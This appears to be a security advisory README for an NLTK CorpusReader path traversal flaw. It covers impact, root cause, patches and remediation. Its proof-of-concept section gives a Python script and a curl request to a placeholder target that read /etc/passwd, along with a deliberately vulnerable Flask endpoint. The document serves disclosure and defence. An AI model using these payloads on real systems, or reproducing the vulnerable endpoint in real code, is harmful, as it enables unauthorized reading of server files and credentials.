# CVE-2026-0847 — NLTK Multiple CorpusReader Classes: Arbitrary File Read via Path Traversal

---

## Overview

| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-0847 |
| **Package** | `nltk` (Natural Language Toolkit) |
| **Registry** | PyPI |
| **Affected Versions** | `<= 3.9.2` |
| **Vulnerability Type** | CWE-22: Path Traversal |
| **CVSS Score** | 8.6 (High) |
| **Attack Vector** | Network |
| **Attack Complexity** | Low |
| **Privileges Required** | None |
| **User Interaction** | None |
| **Confidentiality Impact** | High |
| **Integrity Impact** | Low |
| **Availability Impact** | Low |
| **Reported On** | December 4, 2025 |
| **CVE Published** | March 4, 2026 |
| **Supported By** | Palo Alto Networks / Prisma AIRS |
| **Status** | Fixed |

---

## Description

Multiple `CorpusReader` classes in the NLTK library accept file path arguments without applying any path canonicalization, allowlist validation, or sandbox restrictions. When an attacker controls the corpus filename or file input (a common scenario in machine learning APIs, upload-based NLP pipelines, and chatbot services), they can supply a crafted path to traverse the directory hierarchy and read arbitrary files on the server.

This vulnerability is particularly critical in networked deployments where NLTK processes user-controlled file paths, as no authentication or privilege is required to exploit it.

---

## Affected Components

| Class | File | Status |
|---|---|---|
| `WordListCorpusReader` | `wordlist.py` L1–L120 | Vulnerable |
| `TaggedCorpusReader` | `tagged.py` L1–L140 | Vulnerable |
| `BracketParseCorpusReader` | `bracket_parse.py` L1–L150 | Vulnerable |
| Other classes using the same base pattern | - | Pending wider audit |

All three classes inherit the same unsafe `CorpusReader.open()` method, which performs no path restriction before resolving and reading the supplied file identifier.
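
Since `CorpusReader.open()` applies no restriction of its own, a caller on an affected version can confine file identifiers before they ever reach a reader. The sketch below is one way to do that, not NLTK's fix: `resolve_within_root` is a hypothetical helper name, and it assumes the corpus lives in a dedicated directory (a root of `/` would still permit every path). It compares whole path components with `os.path.commonpath` rather than a string prefix, so a sibling such as `corpus_evil` is not mistaken for a child of `corpus`.

```python
import os


def resolve_within_root(root: str, fileid: str) -> str:
    """Return the absolute path for fileid, or raise ValueError if it leaves root.

    Hypothetical helper for illustration only; it is not part of NLTK.
    """
    # Treat backslashes as separators so Windows-style input is checked too.
    normalized = fileid.replace("\\", "/")
    if os.path.isabs(normalized):
        raise ValueError(f"absolute path not allowed: {fileid!r}")

    # realpath collapses ".." segments and resolves symlinks.
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, normalized))

    # commonpath works on path components, not raw string prefixes.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError(f"path escapes corpus root: {fileid!r}")
    return candidate
```

A service would call this helper on every user-supplied name and pass the value to a `CorpusReader` only if no `ValueError` is raised; inputs such as `../../etc/passwd` or `/etc/passwd` are rejected before any file is opened.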

---

## Impact

Successful exploitation of this vulnerability can result in:

- **Arbitrary file read**: An attacker can read any file accessible to the process running NLTK, including `/etc/passwd`, `/etc/shadow`, and `/var/log/auth.log`
- **Credential and secret exposure**: SSH private keys (`~/.ssh/id_rsa`), `.env` files, API tokens, and cloud credential files can be extracted
- **Source code and training data disclosure**: Other users' training data or proprietary application source code may be read
- **Remote Code Execution (chained)**: When combined with pickle-deserialization vulnerabilities, path traversal can be used to load malicious model files and escalate to full RCE
- **Lateral movement**: In microservice environments, extracted secrets can enable lateral movement and full server compromise

---

## Proof of Concept

> **This information is provided for educational and defensive purposes only. Do not test against systems you do not own or have explicit authorization to test.**

### Local File Read via Direct API

```python
# PoC.py: demonstrates arbitrary file read using three vulnerable CorpusReader classes
from nltk.corpus.reader import WordListCorpusReader, TaggedCorpusReader, BracketParseCorpusReader
from nltk.corpus.reader.util import FileSystemPathPointer

root = FileSystemPathPointer("/")  # unrestricted filesystem root
target = "etc/passwd"              # any sensitive file path

print("--- WordListCorpusReader ---")
reader1 = WordListCorpusReader(root, [target])
print(reader1.raw(target)[:200])

print("--- TaggedCorpusReader ---")
reader2 = TaggedCorpusReader(root, [target])
print(reader2.raw(target)[:200])

print("--- BracketParseCorpusReader ---")
reader3 = BracketParseCorpusReader(root, [target])
print(reader3.raw(target)[:200])
```

**Output (abbreviated):**

```
--- WordListCorpusReader ---
root:x:0:0:root:/root:/usr/bin/zsh
--- TaggedCorpusReader ---
root:x:0:0:root:/root:/usr/bin/zsh
--- BracketParseCorpusReader ---
root:x:0:0:root:/root:/usr/bin/zsh
```

### Remote Exploit Scenario: Vulnerable Flask API

A realistic scenario where NLTK is exposed via an HTTP API:

```python
# Vulnerable API server
from flask import Flask, request
from nltk.corpus.reader import WordListCorpusReader
from nltk.corpus.reader.util import FileSystemPathPointer

app = Flask(__name__)
root = FileSystemPathPointer("/")

@app.post("/read")
def read_file():
    # The user-supplied value is passed straight through as a file identifier
    filename = request.json.get("file")
    reader = WordListCorpusReader(root, [filename])
    return reader.raw(filename)

app.run("0.0.0.0", 8000)
```

**Attacker request:**

```bash
curl -X POST http://TARGET:8000/read \
  -H "Content-Type: application/json" \
  -d '{"file": "etc/passwd"}'
```

**Result:** Full contents of `/etc/passwd` returned to the attacker with no authentication required.

---

## Root Cause

The vulnerability originates in `CorpusReader.open()`. The method resolves the supplied `fileid` directly against the configured root path using `FileSystemPathPointer.join()` without performing any of the following checks:

- Absolute path rejection
- Parent directory traversal (`..`) detection
- Path normalization and comparison to enforce confinement within the corpus root

Because `FileSystemPathPointer` can be initialized with `/`, an attacker who controls the filename argument has unrestricted read access to the entire filesystem.

---

## Suggested Patch

Minimal fix proposed by the researcher, to be applied inside `CorpusReader.open()`:

```python
import os

normalized = fileid.replace("\\", "/")

# Block absolute paths
if os.path.isabs(normalized):
    raise ValueError("Absolute paths are not permitted.")

# Block directory traversal sequences
if ".." in normalized.split("/"):
    raise ValueError("Path traversal sequences are not permitted.")

# Enforce confinement within corpus root
joined = self._root.join(normalized)
if not os.path.normpath(joined._path).startswith(
    os.path.normpath(self._root._path)
):
    raise ValueError("Path escapes the corpus root directory.")
```

The upstream fix PR is available at: [https://github.com/nltk/nltk/pull/3479](https://github.com/nltk/nltk/pull/3479)

---

## Remediation

| Action | Details |
|---|---|
| **Upgrade NLTK** | Update to a release later than 3.9.2 that includes the official fix |
| **Input Validation** | Sanitize and validate all user-supplied file path values before passing them to any NLTK `CorpusReader` class |
| **Avoid User-Controlled Paths** | Do not allow user input to directly or indirectly control the `fileids` argument of any `CorpusReader` |
| **Least Privilege** | Run NLTK-based services under a restricted OS user account with read access limited to the corpus directory only |
| **Containerization** | Isolate the service in a Docker container or chroot jail to limit the blast radius of a successful traversal |
| **Ubuntu Patch** | Monitor the [Ubuntu Security Advisory](https://ubuntu.com/security/CVE-2026-0847) for distribution-level package updates |

**Upgrade via pip:**

```bash
pip install --upgrade nltk
```

**Verify installed version:**

```bash
python -c "import nltk; print(nltk.__version__)"
```

---

## Timeline

| Date | Event |
|---|---|
| December 4, 2025 | Vulnerability reported to huntr.dev by researcher hyperps1 |
| December 2025 | NLTK maintainer team notified via huntr.dev |
| January 2026 | NLTK maintainer validated the vulnerability; disclosure bounty awarded to researcher |
| January 2026 | CVE-2026-0847 assigned |
| February 2026 | 48-hour pre-publication warning sent to NLTK maintainers |
| March 4, 2026 | CVE published on NVD and huntr.dev |
| March 5, 2026 | NVD record last modified |

---

## References

| Resource | Link |
|---|---|
| NVD Entry | https://nvd.nist.gov/vuln/detail/CVE-2026-0847 |
| Ubuntu Security Advisory | https://ubuntu.com/security/CVE-2026-0847 |
| Official CVE Record | https://cve.org/CVERecord?id=CVE-2026-0847 |
| huntr.dev Report | https://huntr.dev |
| Fix Pull Request | https://github.com/nltk/nltk/pull/3479 |
| NLTK on PyPI | https://pypi.org/project/nltk/ |
| OWASP Path Traversal | https://owasp.org/www-community/attacks/Path_Traversal |
| CWE-22 | https://cwe.mitre.org/data/definitions/22.html |

---

## Disclaimer

This repository documents CVE-2026-0847 strictly for **educational, research, and defensive security purposes**. The proof-of-concept code and technical details are provided to assist developers, security engineers, and system administrators in understanding, assessing, and remediating this vulnerability.

Any use of this information to access systems without explicit authorization is illegal and unethical. The author assumes no liability for misuse of the information contained herein.

Contributors: [@mohitf070304](https://github.com/mohitf070304)